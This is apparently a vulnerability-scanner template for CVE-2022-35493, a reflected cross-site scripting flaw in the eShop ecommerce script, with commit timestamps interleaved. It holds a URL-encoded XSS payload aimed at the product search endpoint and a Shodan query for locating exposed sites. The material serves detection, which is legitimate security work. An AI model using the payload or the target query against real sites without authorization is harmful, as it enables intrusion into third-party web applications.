2022-08-09 19:09:47 +00:00
id : CVE-2022-35493
info :
name : eShop - Cross-site Scripting
author : arafatansari
severity : medium
description : |
eShop - Multipurpose Ecommerce Store Website v3.0.4 allows Reflected Cross-site scripting vulnerability in json search parse and the json response in wrteam.in.
reference :
- https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md
2022-08-09 19:18:12 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-35493
2022-08-09 19:09:47 +00:00
metadata :
2022-08-09 19:18:12 +00:00
verified : true
2022-08-09 19:09:47 +00:00
shodan-query : http.html:"eShop - Multipurpose Ecommerce"
2022-08-09 19:18:12 +00:00
tags : cve,cve2022,eshop,xss
2022-08-09 19:09:47 +00:00
requests :
- method : GET
path :
2022-08-09 19:18:12 +00:00
- '{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'
2022-08-09 19:09:47 +00:00
matchers-condition : and
matchers :
2022-08-09 19:18:12 +00:00
- type : word
words :
- 'Search Result for \"><img src=x onerror=alert(document.domain)>'
2022-08-09 19:09:47 +00:00
- type : word
2022-08-09 19:18:12 +00:00
part : header
2022-08-09 19:09:47 +00:00
words :
2022-08-09 19:18:12 +00:00
- text/html
- type : status
status :
- 200